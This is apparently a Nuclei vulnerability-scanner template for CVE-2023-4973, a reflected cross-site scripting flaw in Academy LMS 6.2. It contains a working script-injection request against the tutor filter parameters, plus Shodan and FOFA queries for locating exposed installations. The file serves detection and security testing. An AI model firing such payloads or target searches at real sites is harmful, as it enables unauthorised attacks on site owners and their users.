43 lines
2.1 KiB
YAML
43 lines
2.1 KiB
YAML
id: CVE-2023-4973
|
|
|
|
info:
|
|
name: Academy LMS 6.2 - Cross-Site Scripting
|
|
author: ritikchaddha,princechaddha
|
|
severity: medium
|
|
description: |
|
|
A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/174680/Academy-LMS-6.2-Cross-Site-Scripting.html
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4973
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-4973
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: creativeitem
|
|
product: academy_lms
|
|
shodan-query:
|
|
- html:"Academy LMS"
|
|
- http.html:"academy lms"
|
|
fofa-query:
|
|
- body="Academy LMS"
|
|
- body="academy lms"
|
|
tags: packetstorm,cve2023,cve,academylms,xss,creativeitem
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_tution_class_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_duration%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(header, "text/html")'
|
|
- 'contains_all(body, "<script>alert(document.domain)</script>", "List of tuitions")'
|
|
condition: and
|
|
# digest: 490a00463044022003e0aa31c056206272163376e4fb2c16f1424282178f7657a1304483ba6b675702202d0e0134266df1580d750c23d6339d934549b7fa97dd0ff6b4dffc6ae03e38e4:922c64590222798bb761d5b6d8e72950 |